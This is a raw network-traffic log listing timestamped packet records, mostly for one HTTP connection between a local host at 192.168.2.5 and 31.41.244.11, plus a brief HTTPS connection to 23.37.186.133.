Dec 16, 2024 11:03:18.789124012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.789237976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.789267063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.789283991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.790263891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.790317059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.790390968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.790441036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.791433096 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.791491032 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.791573048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.791624069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.792601109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.792731047 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.792776108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.792804956 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.793742895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.793803930 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.793881893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.793931007 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.794907093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.794969082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.795036077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.795104980 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.796082020 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.796142101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.796215057 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.796273947 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.797216892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.797278881 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.797348976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.797400951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.798357010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.798407078 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.798475981 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.798527002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.799523115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.799582005 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.799653053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.799705029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.800687075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.800813913 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.800825119 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.800863981 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.801825047 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.801969051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.802018881 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.802046061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.802978039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.803109884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.803164005 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.805138111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.805175066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.805234909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.805803061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.805840015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.805855036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.805885077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.806461096 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.806514025 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.806591988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.806643963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.807645082 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.807842970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.807902098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.807902098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.808764935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.808813095 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.808881044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.808926105 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.809938908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.810009003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.810058117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.810106993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.811081886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.811130047 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.811212063 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.811538935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.812261105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.812439919 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.812505960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.813376904 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.813452959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.813510895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.813560009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.814203024 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:18.814292908 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:18.814385891 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:18.814539909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.814590931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.814655066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.814699888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.815722942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.815788984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.815840960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.815840960 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:18.815897942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.815968037 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:18.816853046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.816952944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.817008018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.818037987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.818094969 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.818161964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.818211079 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.819145918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.819211006 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.819288969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.819344044 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.820333004 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.820384026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.820450068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.820498943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.821469069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.821583033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.821609020 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.821630001 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.822608948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.822654009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.822772026 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.822827101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.823854923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.823995113 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.824048042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.824959040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.825058937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.825057983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.825107098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.826121092 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.826169014 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.826215029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.826266050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.827263117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.827330112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.827403069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.827450037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.828409910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.828540087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.828588963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.829545021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.829682112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.829735041 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.830725908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.830779076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.830780029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.830832005 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.831868887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.831917048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.831984043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.832026005 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.833033085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.833086967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.833143950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.833192110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.834207058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.834254026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.834295988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.834343910 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.835416079 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.835463047 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.835491896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.835546970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.836498022 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.836541891 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.968324900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.968480110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.968540907 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.968637943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.968688965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.968703985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.968753099 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.969738960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.969867945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.969921112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.970875978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.970928907 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.971012115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.971060038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.972069025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.972116947 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.972157001 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.972206116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.973227978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.973306894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.973357916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.974356890 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.974407911 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.974412918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.974467039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.975545883 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.975598097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.975668907 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.975714922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.976670980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.976725101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.976794958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.977813959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.977866888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.977933884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.977983952 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.978993893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.979043007 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.979126930 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.979181051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.980180979 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.980232000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.980298042 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.980348110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.981322050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.981508970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.981556892 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.982439995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.982491016 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.982556105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.982608080 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.983628035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.983686924 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.983763933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.983808994 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.984801054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.984930992 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.984983921 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.985932112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.985985041 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.986052990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.986102104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.987086058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.987137079 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.987205982 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.987253904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.988300085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.988352060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.988414049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.988462925 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.989373922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.989428043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.989490032 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.990541935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.990596056 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.990669012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.990721941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.991715908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.991765976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.991832018 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.991882086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.992856979 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.992908001 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.992974997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.993022919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.994045019 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.994215965 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.994267941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.995172977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.995227098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.995290995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.995346069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.996416092 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.996469975 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.996531963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.996577978 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.997522116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.997735977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.997790098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.998645067 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.998744965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.998758078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.998821020 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.999797106 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.999851942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:18.999913931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:18.999962091 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.000943899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.001035929 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.001090050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.002234936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.002290964 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.002372980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.002424002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.003283978 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.003340960 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.003396988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.003448009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.004434109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.004483938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.004558086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.004607916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.005625963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.005677938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.005733967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.006755114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.006804943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.006835938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.006894112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.007919073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.007972002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.007977962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.008025885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.009031057 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.009129047 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.009131908 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.009181023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.010198116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.010252953 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.010304928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.011375904 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.011430979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.011477947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.011524916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.012547970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.012597084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.012654066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.012702942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.013716936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.013853073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.013911009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.014857054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.014895916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.014913082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.014940977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.016077995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.016129971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.016196966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.017182112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.017236948 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.017240047 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.017290115 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.018484116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.018520117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.018573999 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.019443989 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.019546032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.019546986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.019599915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.020591021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.020639896 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.020704031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.020759106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.021748066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.021861076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.021917105 CET	49800	80	192.168.2.5	31.41.244.11
